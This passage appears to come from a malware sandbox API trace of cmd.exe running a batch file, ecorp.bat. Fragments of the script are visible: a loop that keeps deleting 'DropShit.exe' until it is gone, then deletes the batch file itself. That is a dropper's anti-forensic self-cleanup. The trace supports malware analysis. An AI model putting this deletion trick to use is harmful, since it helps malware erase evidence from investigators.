lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.771] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.771] GetFileType (hFile=0x7) returned 0x2 [0091.772] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.772] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.772] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.772] GetFileType (hFile=0x7) returned 0x2 [0091.772] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.772] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.773] GetFileType (hFile=0x7) returned 0x2 [0091.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.773] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.773] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.773] GetFileType (hFile=0x7) returned 0x2 [0091.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.774] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.774] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.774] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.774] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.774] GetFileType (hFile=0x7) returned 0x2 [0091.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.774] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.774] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.774] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.775] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.775] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.775] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x251b40 [0091.775] FindClose (in: hFindFile=0x251b40 | out: hFindFile=0x251b40) returned 1 [0091.775] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.775] GetProcessHeap () returned 0x250000 [0091.775] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.775] GetProcessHeap () returned 0x250000 [0091.775] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.775] GetProcessHeap () returned 0x250000 [0091.775] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.775] GetProcessHeap () returned 0x250000 [0091.775] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.775] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.775] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.775] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.775] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.775] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.775] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] GetFileType (hFile=0x5c) returned 0x1 [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.776] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] GetFileType (hFile=0x5c) returned 0x1 [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.776] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.776] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.776] GetFileType (hFile=0x5c) returned 0x1 [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.776] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.776] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.776] _close (_FileHandle=3) returned 0 [0091.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.776] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.777] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.777] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.777] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.777] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.777] SetConsoleInputExeNameW () returned 0x1 [0091.777] GetConsoleOutputCP () returned 0x1b5 [0091.777] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.777] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.777] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.777] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.777] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a80 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a40 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.778] GetProcessHeap () returned 0x250000 [0091.778] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.778] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.778] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.778] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0091.778] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.778] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0091.778] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.778] GetFileType (hFile=0x5c) returned 0x1 [0091.778] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.778] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.779] GetProcessHeap () returned 0x250000 [0091.779] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.779] GetProcessHeap () returned 0x250000 [0091.779] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.779] GetProcessHeap () returned 0x250000 [0091.779] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.779] GetProcessHeap () returned 0x250000 [0091.779] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0091.779] GetProcessHeap () returned 0x250000 [0091.779] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0091.779] _tell (_FileHandle=3) returned 29 [0091.779] _close (_FileHandle=3) returned 0 [0091.779] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.779] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.779] GetFileType (hFile=0x7) returned 0x2 [0091.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.780] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.780] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.780] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.780] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.780] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.780] GetFileType (hFile=0x7) returned 0x2 [0091.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.780] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.781] GetFileType (hFile=0x7) returned 0x2 [0091.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0091.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.781] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0091.781] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0091.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.782] GetFileType (hFile=0x7) returned 0x2 [0091.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.782] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0091.782] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.782] GetFileType (hFile=0x7) returned 0x2 [0091.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.783] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.783] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0091.783] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0091.783] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.783] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x251980 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251980, Size=0x30) returned 0x251980 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251980) returned 0x30 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x2519c0 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2519c0, Size=0x30) returned 0x2519c0 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2519c0) returned 0x30 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.783] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.783] GetProcessHeap () returned 0x250000 [0091.783] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a00 [0091.783] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.784] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a60 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x251ac0 [0091.784] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.784] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.784] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x26ccf0 [0091.784] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26cd00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.784] SetErrorMode (uMode=0x0) returned 0x0 [0091.784] SetErrorMode (uMode=0x1) returned 0x0 [0091.784] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.784] SetErrorMode (uMode=0x0) returned 0x1 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26cf10 [0091.784] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.784] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.784] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x251d30 [0091.784] GetProcessHeap () returned 0x250000 [0091.784] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26d180 [0091.785] GetProcessHeap () returned 0x250000 [0091.785] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26d1f0 [0091.785] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26d204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26d204) returned 0x26da10 [0091.785] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.785] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.785] GetLastError () returned 0x5 [0091.785] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.785] GetFileType (hFile=0x7) returned 0x2 [0091.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.785] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.786] _get_osfhandle (_FileHandle=2) returned 0xb [0091.786] GetFileType (hFile=0xb) returned 0x2 [0091.786] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.786] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.786] _get_osfhandle (_FileHandle=2) returned 0xb [0091.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.786] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.786] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.786] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.787] FindNextFileW (in: hFindFile=0x26da10, lpFindFileData=0x26d204 | out: lpFindFileData=0x26d204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.787] GetLastError () returned 0x12 [0091.787] FindClose (in: hFindFile=0x26da10 | out: hFindFile=0x26da10) returned 1 [0091.788] GetProcessHeap () returned 0x250000 [0091.788] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d1f0 | out: hHeap=0x250000) returned 1 [0091.788] 